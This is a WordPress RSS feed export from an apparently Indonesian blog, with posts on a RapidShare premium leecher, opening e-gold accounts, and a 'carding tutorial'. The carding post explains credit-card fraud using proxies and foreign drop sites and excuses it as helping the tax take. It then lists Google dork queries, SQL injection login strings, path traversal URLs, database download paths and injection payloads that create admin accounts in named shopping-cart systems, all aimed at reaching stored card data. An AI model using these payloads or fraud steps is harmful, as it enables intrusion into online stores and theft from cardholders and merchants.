<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Free Internet Marketer Tutorial</title>
	<atom:link href="http://addrsinfo.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://addrsinfo.wordpress.com</link>
	<description>find free internet marketer tutorial,adsense,affiliate</description>
	<lastBuildDate>Tue, 15 Jan 2008 05:09:14 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='addrsinfo.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Free Internet Marketer Tutorial</title>
		<link>http://addrsinfo.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://addrsinfo.wordpress.com/osd.xml" title="Free Internet Marketer Tutorial" />
	<atom:link rel='hub' href='http://addrsinfo.wordpress.com/?pushpress=hub'/>
		<item>
		<title>rapidshare premium link maker leecher</title>
		<link>http://addrsinfo.wordpress.com/2008/01/15/rapidshare-premium-link-maker-leecher/</link>
		<comments>http://addrsinfo.wordpress.com/2008/01/15/rapidshare-premium-link-maker-leecher/#comments</comments>
		<pubDate>Tue, 15 Jan 2008 05:09:14 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2008/01/15/rapidshare-premium-link-maker-leecher/</guid>
		<description><![CDATA[www.creativeinovation.com/share ato www.creativeinovation.com/share2<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=31&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>www.creativeinovation.com/share</p>
<p>ato</p>
<p>www.creativeinovation.com/share2</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/31/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/31/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/31/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/31/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/31/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=31&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2008/01/15/rapidshare-premium-link-maker-leecher/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
		<item>
		<title>Mengenal e-gold</title>
		<link>http://addrsinfo.wordpress.com/2007/05/15/mengenal-e-gold/</link>
		<comments>http://addrsinfo.wordpress.com/2007/05/15/mengenal-e-gold/#comments</comments>
		<pubDate>Tue, 15 May 2007 15:53:36 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/05/15/mengenal-e-gold/</guid>
		<description><![CDATA[Apa itu E-Gold™ ? E-gold™ adalah sebuah mata uang digital elektronik/ e-currency yang dikeluarkan oleh perusahaan e-gold Ltd. Mata uang ini sepenuhnya di backup oleh 100% nilai emas murni yang berlaku di pasar dunia. “E-gold is gold itself circulated electronically. Entrepreneur JP May says that &#8220;e-gold is to money what e-mail is to letters.” E-Gold [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=29&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Apa itu E-Gold™ ?</p>
<p>E-gold™ adalah sebuah mata uang digital elektronik/ e-currency yang dikeluarkan oleh perusahaan e-gold Ltd. Mata uang ini sepenuhnya di backup oleh 100% nilai emas murni yang berlaku di pasar dunia.</p>
<p>“E-gold is gold itself circulated electronically. Entrepreneur JP May says that &#8220;e-gold is to money what e-mail is to letters.”</p>
<p>E-Gold merupakan e-currency paling populer dan terpercaya saat ini. Sudah lama digunakan (sejak 1996) sebagai sarana pembayaran oleh berbagai merchant di seluruh dunia</p>
<p>Pembukaan rekening E-gold™ adalah gratis tanpa ada kewajiban memberikan setoran awal maupun sejenisnya. Anda tidak harus memiliki kartu kredit untuk dapat membuka rekening e-gold™. Pembukaan rekening E-gold™ dapat dilakukan dengan sangat mudah.</p>
<p>Apa Satuan/Besaran yang Dipergunakan E-Gold ?</p>
<p>Satuan e-gold itu adalah troy ounces.<br />
Satu troy ounces itu kira-kira 31.1 grams emas.</p>
<p>Nah, dari berat emas itu kemudian dihargai dengan mata uang macem-macem, USD, EUR, dll. Harganya bervariasi tergantung dengan harga emasnya saat itu terhadap kurs yang bersangkutan.<br />
Harga emas, perak, dan platinum sehari-harinya dapat dilihat di : http://www.kitco.com/</p>
<p>Apa Manfaat dari E-gold ?</p>
<p>Manfaat dari e-gold antara lain:</p>
<p>* Berbelanja online contoh : http://www.goldstores.com/<br />
* Menyimpan emas secara praktis dan efisien<br />
* Melakukan pembayaran dari orang ke orang<br />
* e-commerce<br />
* Payroll<br />
* Membayar tagihan<br />
* Menyumbang<br />
* Spekulasi/trading<br />
* Investasi<br />
* dll</p>
<p>Apakah E-Gold Bisa Dijadikan Uang ?</p>
<p>Bisa. e-gold itu bisa dijadiin duit cash baik dollar maupun rupiah.Sekarang anda bisa menjual atau membeli E-Gold dengan mudah dan simple di Indonesia. Tidak perlu lagi menunggu 2 minggu atau 1 bulan untuk mencairkan E-Gold anda.</p>
<p>Sebaiknya anda memiliki rekening BCA supaya proses transfer dan pencairan dana dapat dilakukan dengan cepat dan tanpa biaya transfer.</p>
<p>1. Cepat hanya membutuhkan waktu Max 2 x 24 Jam.</p>
<p>2. Tidak perlu menunggu Cek dari E-Gold.</p>
<p>3. Tidak perlu Collection Fee.</p>
<p>4. Di bayar langsung ke account bank anda.</p>
<p>Dimanakah Saya Bisa Mencairkan E-Gold ?</p>
<p>Berikut tempat untuk menjual/membeli Egold di Indonesia:</p>
<p>1. http://indochanger.com (Sangat disarankan : Kompetitif, minimal beli $1, cepat)<br />
2. http://www.sentraegold.com<br />
3. dll. (bisa juga exchange langsung dengan anggota forum)</p>
<p>Luar Negeri :</p>
<p>1. https://www.goldex.net<br />
2. http://www.goldage.net<br />
3. http://www.fastgold.net<br />
4. https://www.e-forexgold.com<br />
5. http://www.anygoldnow.com<br />
6. dll.</p>
<p>Bagaimana Cara Membuka Account Gratis Di E-Gold™ ???</p>
<p>1. Pertama tentu saja anda harus dapat mengerti bahasa Inggris pasif dengan membaca standard perintah pengisian formulir.</p>
<p>2. Ketik pada kolom address web browser anda ke http://www.e-gold.com ,. Nantinya setelah anda mendapatkan nomor account dari e-gold™ andapun dapat mereferensikan kepada rekan atau keluarga anda dengan mengganti 6 digit nomor diatas dengan account anda sendiri.</p>
<p>3. Setelah masuk Layar akan menampilkan User Agreement juga dalam bahasa Inggris. Baca dan bila setuju klik tombol &#8220;I Agree&#8221; dibagian bawah.</p>
<p>4. Selanjutnya layar akan menampilkan New e-gold™ Account Creation Form yang terdiri dari 5 bagian:<br />
- Account name<br />
- User Name<br />
- Point of contact<br />
- Passphrase<br />
- Turing number entry</p>
<p>Catatan:</p>
<p>· semua huruf tebal(bold) harus diisi.</p>
<p>· Perhatikan 128bit SSL dengan simbol &#8216;gembok kuning&#8217; dikanan bawah layar anda karena itu menjamin security dari data yang anda isikan.</p>
<p>· Pilih/tentukan Account name dan user name yang anda kehendaki.</p>
<p>· Point of contact diisi data asli/yang sebenarnya.(karena jika anda lupa passphrase, maka passphrase ini akan dikirim melalui surat ke alamat Anda)</p>
<p>· Email address harus email yang masih berlaku, karena konfirmasi nomor account baru akan di kirim ke alamat tersebut.</p>
<p>· Telepon dan Alternate passphrase penting untuk nantinya digunakan untuk konfirmasi dalam bertransaksi PASSPHRASE, pilih minimum 6 digit angka dan huruf (campur lebih baik), kemudian dicatat karena passphrase tidak akan diberitahukan dalam email anda dan sangat RAHASIA Untuk mengakses account dan melakukan transaksi jual/beli e-gold™.</p>
<p>· Jangan menggunakan passphrase yang sama dengan email dan keanggotaan anda di web lain.</p>
<p>· Turing number hanya untuk disalin pada kolom yang tersedia dan akan selalu berubah setiap kali anda anda membuka web yang memiliki turing number.Turing number untuk keamanan pihak e-gold™ sendiri dalam mencegah pendaftaran otomatis.</p>
<p>5. Klik &#8220;open&#8221;. Apabila ada yang belum lengkap ikuti perintah pada layar sampai selesai.</p>
<p>6. Setelah selesai tunggu konfirmasi nomor account di email anda.Selanjutnya anda sudah dapat mengakses account anda dengan memasukkan nomor dan passphrase serta tentu saja turing number yang selalu berbeda.</p>
<p>Apakah Daftar ke E-gold Harus Menggunakan Identitas Asli ?</p>
<p>Sebenarnya tidak. Tapi untuk keamanan apabila terjadi claim atau untuk menghindari beberapa masalah ketika lupa password/passphrase, sebaiknya Anda menggunakan identitas Anda dengan lengkap dan benar, karena e-gold akan memberikan password baru (sementara) ke alamat Anda melalui surat, dan jangan lupa nomor telepon yg asli karena mereka akan menelepon anda (walupun account Anda ga ada duitnya, pengalaman pribadi neh )<br />
yg terpenting passphrase jgn sampai lupa .</p>
<p>Menu apa saja yang tersedia di e-gold ?</p>
<p>Menu yang disediakan adalah sbb.:<br />
Balance = untuk melihat saldo dana anda.<br />
Spend = untuk transfer dana ke rekening e-Gold lain.<br />
History = untuk melihat perincian transaksi, semacam buku rekening tabungan.Anda akan tahu mendapat transfer dari siapa, atau anda transfer kepada siapa.<br />
Account Info = untuk merubah profile dan passphrase/password.<br />
Pastikan selalu logout untuk keamanan account anda.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/29/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/29/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/29/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/29/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/29/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=29&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/05/15/mengenal-e-gold/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
		<item>
		<title>Carding Tutorial serta Bug online store, ini sebuah artikel</title>
		<link>http://addrsinfo.wordpress.com/2007/04/21/carding-tutorial-serta-bug-online-store-ini-sebuah-artikel/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/21/carding-tutorial-serta-bug-online-store-ini-sebuah-artikel/#comments</comments>
		<pubDate>Sat, 21 Apr 2007 08:22:01 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/21/carding-tutorial-serta-bug-online-store-ini-sebuah-artikel/</guid>
		<description><![CDATA[Carding adalah awalnya sebuah teknik penipuan yang melibatkan kartu kredit, dan sampai sekarang Carding kejahatan internet yang paling fenomenal,carding adalah seni atau bentuk lain dari teknik penipuan murni. yang melibatkan fasilitas IT, khuususnya internet. carding bisa sangat sulit dibasmi dan sangat sulit di hancurkan, tetapi itu bisa. carding yang teroganisir akan melibatkan banyak fihak yang [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=28&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Carding adalah awalnya sebuah teknik penipuan yang melibatkan kartu kredit, dan sampai sekarang Carding kejahatan internet yang paling fenomenal,carding adalah seni atau bentuk lain dari teknik penipuan murni. yang melibatkan fasilitas IT, khuususnya internet. carding bisa sangat sulit dibasmi dan sangat sulit di hancurkan, tetapi itu bisa. carding yang teroganisir akan melibatkan banyak fihak yang terlibat, sehingga tidak mudah untuk di dilacak, berikut teknik carding yang paling lazim terjadi :<br />
Mr. Bejo ( pelaku carding di indonesia)<br />
Mr. Benjamin ( drop place / drop site di luar negeri, sebut saja cina atau jepang)</p>
<p>alat yang biasa di gunakan oleh Mr.A adalah ( proxy, dan data CC atau kartu kredit, anggap saja data USA )<br />
dalam hal ini Mr. bejo dan mr.benjamin biasanya adalah temen yang didapat dari chatting, yang mempunyai ikatan saling ketergantungan lewat bisnis semata, mereka biasanya tidak saling kenal.(bisnis ini berlangsung, kareana bisanya mereka terikat keuntungan 50-50)</p>
<p>praktek carding terjadi biasannya dilakukan Mr.bejo dengan sangat matang dan terencana:<br />
kira-kira akan seperti berikut ini prakteknya :</p>
<p>MR.bjodengan data kartu kredit orang amerika akan menjadi siempunya kartukredit itu, dia dengan fasilitas internet akan menyamar menjadi orang amerika itu dengan menggunakan Proxy ( merubah IP addressnya)<br />
jadi ketika dia membeli membeli barang misalnya 2 biji handhone dari toko yang di australia si Mr.bejo ini telah menjadi berada di amerika, ya dengan menggunakan proxy, posisi mr.bejo seakan-akan ada di amerika. itu akan membuat simpunya toko di australia menjadi yakin bahwa dia adalah yang punya data kartu kredit asli (dan terkadang pula, yang punya toko tidak tahu menahu urusan transaksi, karena sebagian toko ada yang di handle 100% oleh merchant, jadi bila merchant sudah approve, toko mengirimkannya) dikirim kemana? jawabnya ke Mr.benjamin dan dari 2 HP tadi maka 1 HP adalah milik mr.bejo yang dikirim ke indonesia.</p>
<p>selain lewat toko biasanya para carder bekerja arena lelang barang (auction), yaitu menipu lewat orang perorangan, sehingga barang bukti akan semakin sedikit,<br />
lalu kita akan mereview apa yang telah terjadi :</p>
<p>- uang orang amerika akan hilang (tapi mungkin akan diganti oleh asuransi bank)<br />
- 2 HP sitoko australia akan hilang ( rugi 100%)<br />
- Mr. B dapat 1 HP<br />
- Mr. A dapat 1 HP</p>
<p>negara yang terlibat :<br />
- Amerika<br />
- Australia<br />
- Indonesia<br />
- Cina</p>
<p>biasanya negara seperti amerika atau australia tidak bisa berkutik untuk interpensi ke negara2 seperti cina atau jepang. makanya pengusutan selalu kandas, dan untuk uang sejumlah 10 &#8211; 20 juta melibatkan 4 negara akan sangat sulit sekali di realisasikan penyelesaiannya</p>
<p>kembali ke Mr. bejo setelah mereka mendapatkan HP, ada hal yang selalu menjadi alasan klasik tapi lugu,<br />
kenapa negara ikut kasuk kusus membasmi anak bangsanya yang pahlawan pajak?<br />
betul itu yang selalu jadi cerita &#8230;<br />
dari 1 Hp bilanglah negara dapat 200rb, kalikan itu bila 1000 HP dari sekian carder. bukan kan itu pemasukan negara? memeng itu alasan klasik.<br />
dan selain itu dengan sistem seperti diatas, barang sudah 100% bersih karena rantai carding pada dasarnya terputus sampai di china tadi. da indonesia justru tidak terlibat sama &#8211; sekali</p>
<p>Contoh &#8211; Contoh kelemahan pada online store yang sering dimanfaatkan para penjahat</p>
<p>contoh bugs pada bentuk toko sistem shopadmin :<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
Ketik google.com :&#8211;&gt; allinurl:/shopadmin.asp<br />
Contoh target : www.xxxxxx.com/shopadmin.asp<br />
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :<br />
user : &#8216;or&#8217;1<br />
pass : &#8216;or&#8217;1</p>
<p>contoh bugs pada bentuk toko sistem : Index CGI<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/store/index.cgi/page=<br />
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm<br />
Hapus short_blue.htm dan ganti dengan &#8211;&gt; ../admin/files/order.log<br />
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/order.log</p>
<p>contoh bugs pada bentuk toko sistem : metacart<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google.com allinurl:/metacart/<br />
Contoh target : www.xxxxxx.com/metacart/about.asp<br />
Hapus moreinfo.asp dan ganti dengan &#8211;&gt; /database/metacart.mdb<br />
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb</p>
<p>contoh bugs pada bentuk toko sistem <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> CShop<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/DCShop/<br />
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx<br />
Hapus /DCShop/xxxx dan ganti dengan &#8211;&gt; /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt<br />
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt</p>
<p>contoh bugs pada bentuk toko sistem : PDshopro<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/shop/category.asp/catid=<br />
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx<br />
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan &#8211;&gt; /admin/dbsetup.asp<br />
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp<br />
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb<br />
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb<br />
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)</p>
<p>contoh bugs pada bentuk toko sistem : commerceSQL<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google : Ketik &#8211;&gt; allinurl:/commercesql/<br />
Contoh : www.xxxxx.com/commercesql/xxxxx<br />
Hapus commercesql/xxxxx dan ganti dengan &#8211;&gt;<br />
cgi-bin/commercesql/index.cgi?page=<br />
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=<br />
Untuk melihat admin config &#8211;&gt;<br />
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl<br />
Untuk melihat admin manager &#8211;&gt;<br />
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi<br />
Untuk melihat file log/CCnya &#8211;&gt;<br />
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log</p>
<p>contoh bugs pada bentuk toko sistem : EShop<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google: Ketik &#8211;&gt; allinurl:/eshop/<br />
Contoh : www.xxxxx.com/xxxxx/eshop<br />
Hapus /eshop dan ganti dengan &#8211;&gt; /cg-bin/eshop/database/order.mdb<br />
Hasilnya : www.xxxxxx.com/&#8230;/cg-bin/eshop/database/order.mdb<br />
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)</p>
<p>contoh bugs pada bentuk toko sistem : Cart32 v3.5a<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google.com: Ketik &#8211;&gt; allinurl:/cart32.exe/<br />
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound<br />
Ganti NoItemFound dengan &#8211;&gt; error<br />
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!<br />
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory<br />
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc<br />
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.<br />
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/<br />
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format</p>
<p>http://www.xxxxx.com/cart32/</p>
<p>Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/c&#8230;URNS-001065.c32</p>
<p>contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua<br />
google.com Ketik &#8211;&gt; allinurl:/vpasp/shopdisplayproducts.asp<br />
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp<br />
Contoh :</p>
<p>http://xxxxxxx.com/vpasp/shopdisplayproduc&#8230;elect%20fldauto,</p>
<p>fldpassword%20from%20tbluser%20where%20fldusername=<br />
&#8216;admin&#8217;%20and%20fldpassword%20like%20&#8242;a%25&#8242;&#8211;<br />
Gantilah nilai dari string url terakhir dg:<br />
%20&#8242;a%25&#8242;&#8211;<br />
%20&#8242;b%25&#8242;&#8211;<br />
%20&#8242;c%25&#8242;&#8211;<br />
Kalau berhasil, kita akan mendapatkan informasi username dan password admin<br />
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp<br />
silahkan Cari sendiri data CCnya</p>
<p>contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google.com : Ketik &#8211;&gt; allinurl:/vpasp/shopsearch.asp</p>
<p>Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :<br />
Keyword=&amp;category=5); insert into tbluser (fldusername) values<br />
(&#8221;)&#8211;&amp;SubCategory=&amp;hide=&amp;action.x=46&amp;action.y=6<br />
Keyword=&amp;category=5); update tbluser set fldpassword=&#8221; where<br />
fldusername=&#8221;&#8211;&amp;SubCategory=All&amp;action.x=33&amp;action.y=6<br />
Keyword=&amp;category=3); update tbluser set fldaccess=&#8217;1&#8242; where<br />
fldusername=&#8221;&#8211;&amp;SubCategory=All&amp;action.x=33&amp;action.y=6<br />
Jangan lupa untuk mengganti dan nya terserah kamu.<br />
Untuk mengganti password admin, masukkan keyword berikut :<br />
Keyword=&amp;category=5); update tbluser set fldpassword=&#8221; where<br />
fldusername=&#8217;admin&#8217;&#8211;&amp;SubCategory=All&amp;action.x=33&amp;action.y=6</p>
<p>Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp</p>
<p>contoh bugs pada bentuk toko sistem : Lobby.asp<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google.com Ketik &#8211;&gt; allinurl: Lobby.asp<br />
Contoh : www.xxxxx.com/mall/lobby.asp<br />
Hapus tulisan mall/lobby.asp dan ganti dengan &#8211;&gt; fpdb/shop.mdb<br />
Hasilnya : www.xxxxx.com/fpdb/shop.mdb</p>
<p>contoh bugs pada bentuk toko sistem : Shopper.cgi<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google : Ketik &#8211;&gt; allinurl: /cgi-local/shopper.cgi<br />
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&amp;key=<br />
Tambah dengan &#8211;&gt; &#8230;&amp;template=order.log<br />
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&amp;key=&#8230;&amp;template=order.log</p>
<p>contoh bugs pada bentuk toko sistem <img src='http://s2.wp.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> roddetail.asp<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
Ketik &#8211;&gt; allinurl:proddetail.asp?prod=<br />
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle<br />
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan &#8211;&gt; fpdb/vsproducts.mdb<br />
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb</p>
<p>contoh bugs pada bentuk toko sistem <img src='http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> igishop<br />
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :<br />
google Ketik &#8211;&gt; inurl:&#8221;/cart.php?m=&#8221;<br />
Contoh : http://xxxxxxx.com/store/cart.php?m=view.<br />
Hapus tulisan cart.php?m=view dan ganti dengan &#8211;&gt;admin<br />
Hasilnya http://xxxxxx.com/store/admin<br />
Trus masukin username sama pass nya pake statment SQL injection</p>
<p>Usename : &#8216;or&#8221;=&#8221;<br />
Password : &#8216;or&#8221;=&#8221;</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/28/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/28/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/28/" /></a> <img alt="" border="0" 